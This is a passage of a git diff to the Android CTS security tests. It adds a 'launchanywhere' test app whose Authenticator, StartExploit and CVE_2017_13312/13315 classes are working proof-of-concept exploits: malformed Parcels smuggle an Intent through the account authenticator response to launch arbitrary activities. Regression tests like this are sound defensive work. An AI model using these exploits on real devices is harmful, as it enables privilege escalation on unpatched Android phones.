+ return true;
+ }
+
+ @Override
+ public void linkToDeath(DeathRecipient recipient, int flags)
+ throws RemoteException {}
+
+ @Override
+ public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+ return false;
+ }
+ };
+
+ public Authenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response,
+ String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response,
+ String accountType, String authTokenType, String[] requiredFeatures,
+ Bundle options) {
+ try {
+ Field mAccountAuthenticatorResponseField =
+ Class.forName("android.accounts.AccountAuthenticatorResponse")
+ .getDeclaredField("mAccountAuthenticatorResponse");
+
+ mAccountAuthenticatorResponseField.setAccessible(true);
+
+ Object mAccountAuthenticatorResponse =
+ mAccountAuthenticatorResponseField.get(response);
+
+ Class stubClass = null;
+ String responseName = "android.accounts.IAccountAuthenticatorResponse";
+ Class<?>[] classes = Class.forName(responseName).getDeclaredClasses();
+
+ String stubName = responseName + ".Stub";
+ for (Class inner : classes) {
+ if (inner.getCanonicalName().equals(stubName)) {
+ stubClass = inner;
+ break;
+ }
+ }
+
+ Field TRANSACTION_onResultField =
+ stubClass.getDeclaredField("TRANSACTION_onResult");
+ TRANSACTION_onResultField.setAccessible(true);
+ TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+ Class proxyClass = null;
+ String proxyName = stubName + ".Proxy";
+ for (Class inner : stubClass.getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals(proxyName)) {
+ proxyClass = inner;
+ break;
+ }
+ }
+
+ Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+ mRemoteField.setAccessible(true);
+ mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+ mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ return new Bundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(
+ AccountAuthenticatorResponse response, Account account, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(
+ AccountAuthenticatorResponse response, Account account, String[] features)
+ {
+ return null;
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
similarity index 62%
copy from hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
copy to hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
index 5ed4c22..58d75b8 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_08.java
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
@@ -14,19 +14,17 @@
* limitations under the License.
*/
-package android.security.cts;
+package com.android.security.cts.launchanywhere;
-import android.platform.test.annotations.SecurityTest;
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
-@SecurityTest
-public class Poc16_08 extends SecurityTestCase {
- /**
- * b/28026365
- */
- @SecurityTest
- public void testPocCVE_2016_2504() throws Exception {
- if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPoc("CVE-2016-2504", getDevice(), 60);
+public class AuthenticatorService extends Service {
+ protected static final String TAG = StartExploit.TAG;
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
}
- }
-}
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
new file mode 100644
index 0000000..4678de2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
@@ -0,0 +1,76 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13312 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ try {
+ Class clazz = Class.forName("android.media.MediaCas$ParcelableCasData");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ data.writeString("xjoa8h2");
+ data.writeInt(4);
+ data.writeString("android.media.MediaCas$ParcelableCasData");
+
+ data.writeInt(13);
+ data.writeInt(32);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
new file mode 100644
index 0000000..dc15e7e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
@@ -0,0 +1,69 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13315 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("com.android.internal.telephony.DcParamObject");
+ data.writeInt(0);
+
+ data.writeInt(0);
+ data.writeInt(6);
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
similarity index 63%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
rename to hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
index 84ba0ed..bb473ab 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
@@ -1,5 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
+/**
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,14 +12,11 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- -->
+ */
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.userapp">
+package com.android.security.cts.launchanywhere;
- <uses-permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission" />
+import android.content.Intent;
+import android.os.Parcel;
- <application>
- </application>
-</manifest>
-
+public interface IGenerateMalformedParcel { Parcel generate(Intent i); }
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
new file mode 100644
index 0000000..2d439da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.app.Activity;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class StartExploit extends Activity {
+ protected static final String TAG = "LaunchAnyWhere";
+
+ @Override
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ String exploitName = "com.android.security.cts.launchanywhere." +
+ getIntent().getStringExtra("cve");
+
+ String classAccessMessage = "Please ensure that the class is part of "
+ + "the com.android.security.cts.launchanywhere package";
+
+ try {
+ Authenticator.exploit =
+ (IGenerateMalformedParcel) Class.forName(exploitName)
+ .newInstance();
+ } catch (ClassNotFoundException e) {
+ Log.e(TAG, "Unable to load the class " + exploitName + "! " +
+ classAccessMessage);
+ e.printStackTrace();
+ return;
+ } catch (InstantiationException e) {
+ Log.e(TAG, "Unable to instantiate the exploit! " + exploitName);
+ e.printStackTrace();
+ return;
+ } catch (IllegalAccessException e) {
+ Log.e(TAG,
+ "Unable to access class " + exploitName + "! " +
+ classAccessMessage + " and is not private");
+ e.printStackTrace();
+ return;
+ }
+
+ Intent attacker = new Intent();
+ attacker.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ attacker.setAction(Intent.ACTION_RUN);
+ attacker.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"com.launchanywhere"};
+ attacker.putExtra("account_types", authTypes);
+ startActivity(attacker);
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/os/src/android/os/cts/ParcelTest.java b/tests/tests/os/src/android/os/cts/ParcelTest.java
index 7645477..3715850 100644
--- a/tests/tests/os/src/android/os/cts/ParcelTest.java
+++ b/tests/tests/os/src/android/os/cts/ParcelTest.java
@@ -19,7 +19,11 @@
import java.io.FileDescriptor;
import java.io.Serializable;
import java.util.ArrayList;
+import java.util.Collection;
import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.Set;
import android.content.pm.Signature;
import android.os.BadParcelableException;
@@ -3250,4 +3254,58 @@
} catch (RuntimeException expected) {
}
}
+
+ public void testMaliciousMapWrite() {
+ class MaliciousMap<K, V> extends HashMap<K, V> {
+ public int fakeSize = 0;
+ public boolean armed = false;
+
+ class FakeEntrySet extends HashSet<Entry<K, V>> {
+ public FakeEntrySet(Collection<? extends Entry<K, V>> c) {
+ super(c);
+ }
+
+ @Override
+ public int size() {
+ if (armed) {
+ // Only return fake size on next call, to mitigate unexpected behavior.
+ armed = false;
+ return fakeSize;
+ } else {
+ return super.size();
+ }
+ }
+ }
+
+ @Override
+ public Set<Map.Entry<K, V>> entrySet() {
+ return new FakeEntrySet(super.entrySet());
+ }
+ }
+
+ Parcel parcel = Parcel.obtain();
+
+ // Fake having more Map entries than there really are
+ MaliciousMap map = new MaliciousMap<String, String>();
+ map.fakeSize = 1;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+
+ // Fake having fewer Map entries than there really are
+ map = new MaliciousMap<String, String>();
+ map.put("key", "value");
+ map.fakeSize = 0;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+ }
}
diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml
index f845462..c516a60 100644
--- a/tests/tests/permission/AndroidTest.xml
+++ b/tests/tests/permission/AndroidTest.xml
@@ -33,17 +33,11 @@
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="push" value="CtsAppThatRequestsPermissionAandB.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsPermissionAandB.apk" />
<option name="push" value="CtsAppThatRequestsPermissionAandC.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsPermissionAandC.apk" />
- <option name="push" value="CtsAdversarialPermissionUserApp.apk->/data/local/tmp/cts/permissions/CtsAdversarialPermissionUserApp.apk" />
- <option name="push" value="CtsAdversarialPermissionDefinerApp.apk->/data/local/tmp/cts/permissions/CtsAdversarialPermissionDefinerApp.apk" />
- <option name="push" value="CtsVictimPermissionDefinerApp.apk->/data/local/tmp/cts/permissions/CtsVictimPermissionDefinerApp.apk" />
</target_preparer>
<!-- Remove additional apps if installed -->
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="teardown-command" value="pm uninstall android.permission.cts.appthatrequestpermission" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.AdversarialPermissionDefinerApp" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.userapp" />
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
diff --git a/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java b/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java
deleted file mode 100644
index 2cf261a..0000000
--- a/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java
+++ /dev/null
@@ -1,119 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.permission.cts;
-
-import static android.content.pm.PackageInfo.REQUESTED_PERMISSION_GRANTED;
-import static android.content.pm.PackageManager.GET_PERMISSIONS;
-
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assert.assertTrue;
-
-import android.app.Instrumentation;
-import android.content.Context;
-import android.content.pm.PackageInfo;
-import android.content.pm.PackageManager;
-import android.platform.test.annotations.SecurityTest;
-import android.support.test.InstrumentationRegistry;
-
-import com.android.compatibility.common.util.SystemUtil;
-
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Test;
-
-public class RemovePermissionTest {
- private static final String APP_PKG_NAME = "android.permission.cts.revokepermissionwhenremoved";
- private static final String USER_PKG_NAME =
- "android.permission.cts.revokepermissionwhenremoved.userapp";
- private static final String VICTIM_PKG_NAME =
- "android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp";
- private static final String TEST_PERMISSION =
- "android.permission.cts.revokepermissionwhenremoved.TestPermission";
-
- private Context mContext;
- private Instrumentation mInstrumentation;
-
- @Before
- public void setContextAndInstrumentation() {
- mContext = InstrumentationRegistry.getTargetContext();
- mInstrumentation = InstrumentationRegistry.getInstrumentation();
- }
-
- @Before
- public void wakeUpScreen() {
- SystemUtil.runShellCommand("input keyevent KEYCODE_WAKEUP");
- }
-
- @After
- public void cleanUp() throws Exception {
- uninstallApp(USER_PKG_NAME);
- uninstallApp(VICTIM_PKG_NAME);
- uninstallApp(APP_PKG_NAME + ".AdversarialPermissionDefinerApp");
- }
-
- private boolean permissionGranted(String permName) throws PackageManager.NameNotFoundException {
- PackageInfo appInfo = mContext.getPackageManager().getPackageInfo(USER_PKG_NAME,
- GET_PERMISSIONS);
-
- for (int i = 0; i < appInfo.requestedPermissions.length; i++) {
- if (appInfo.requestedPermissions[i].equals(permName)) {
- return ((appInfo.requestedPermissionsFlags[i] & REQUESTED_PERMISSION_GRANTED) != 0);
- }
- }
- return false;
- }
-
- private void installApp(String apk) {
- String installResult = SystemUtil.runShellCommand(
- "pm install -r data/local/tmp/cts/permissions/" + apk + ".apk");
- assertEquals("Success", installResult.trim());
- }
-
- private void uninstallApp(String pkg) {
- uninstallApp(pkg, false);
- }
-
- private void uninstallApp(String pkg, boolean assertSuccess) {
- String uninstallResult = SystemUtil.runShellCommand(
- "pm uninstall " + pkg);
- if (assertSuccess) {
- assertEquals("Success", uninstallResult.trim());
- }
- }
-
- private void grantPermission(String pkg, String permission) {
- mInstrumentation.getUiAutomation().grantRuntimePermission(
- pkg, permission);
- }
-
- @SecurityTest
- @Test
- public void permissionShouldBeRevokedIfRemoved() throws Throwable {
- installApp("CtsAdversarialPermissionDefinerApp");
- installApp("CtsAdversarialPermissionUserApp");
-
- grantPermission(USER_PKG_NAME, TEST_PERMISSION);
- assertTrue(permissionGranted(TEST_PERMISSION));
-
- // Uninstall app which defines a permission with the same name as in victim app.
- // Install the victim app.
- uninstallApp(APP_PKG_NAME + ".AdversarialPermissionDefinerApp", true);
- installApp("CtsVictimPermissionDefinerApp");
- assertFalse(permissionGranted(TEST_PERMISSION));
- }
-}
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk
deleted file mode 100644
index 0302643..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk
+++ /dev/null
@@ -1,31 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
-
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
-LOCAL_PACKAGE_NAME := CtsAdversarialPermissionDefinerApp
-
-
-include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml
deleted file mode 100644
index 20fd73a..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- -->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.AdversarialPermissionDefinerApp">
-
- <permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission"
- android:protectionLevel="dangerous"
- android:label="TestPermission"
- android:description="@string/test_permission" />
-
- <application>
- </application>
-</manifest>
-
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk
deleted file mode 100644
index 9aaa6ac..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk
+++ /dev/null
@@ -1,17 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH:= $(call my-dir)
-
-include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
deleted file mode 100644
index 512d6ac..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/Android.mk
+++ /dev/null
@@ -1,31 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
-
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
-
-LOCAL_PACKAGE_NAME := CtsVictimPermissionDefinerApp
-
-
-include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml
deleted file mode 100644
index 72f836d..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- -->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp">
-
- <permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission"
- android:protectionLevel="signature"
- android:label="Test Permission"
- android:description="@string/test_permission" />
-
- <application>
- </application>
-</manifest>
-
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml
deleted file mode 100644
index 062b41c..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml
+++ /dev/null
@@ -1,19 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2018 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-
-<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
- <string name="test_permission">Test Permission</string>
-</resources>
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 4da499e..51d48e7 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -50,6 +50,10 @@
<category android:name="android.intent.category.FRAMEWORK_INSTRUMENTATION_TEST"/>
</intent-filter>
</activity>
+
+ <activity android:name="android.security.cts.ActivityManagerTest$NormalActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$MaliciousActivity" />
+ <service android:name="android.security.cts.ActivityManagerTest$AppMonitoringService" />
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/res/raw/bug_33250932_avc.mp4 b/tests/tests/security/res/raw/bug_33250932_avc.mp4
new file mode 100644
index 0000000..ff6ce03
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33250932_avc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_36592202.ogg b/tests/tests/security/res/raw/bug_36592202.ogg
old mode 100755
new mode 100644
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_37430213.mp4 b/tests/tests/security/res/raw/bug_37430213.mp4
new file mode 100644
index 0000000..618f620
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_37430213.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_65484460.mp4 b/tests/tests/security/res/raw/bug_65484460.mp4
deleted file mode 100644
index 13b37e9..0000000
--- a/tests/tests/security/res/raw/bug_65484460.mp4
+++ /dev/null
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_70239507.aac b/tests/tests/security/res/raw/bug_70239507.aac
new file mode 100644
index 0000000..9132beb
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_70239507.aac
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_74114680_ts.mp4 b/tests/tests/security/res/raw/bug_74114680_ts.mp4
new file mode 100644
index 0000000..10e20bd
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_74114680_ts.mp4
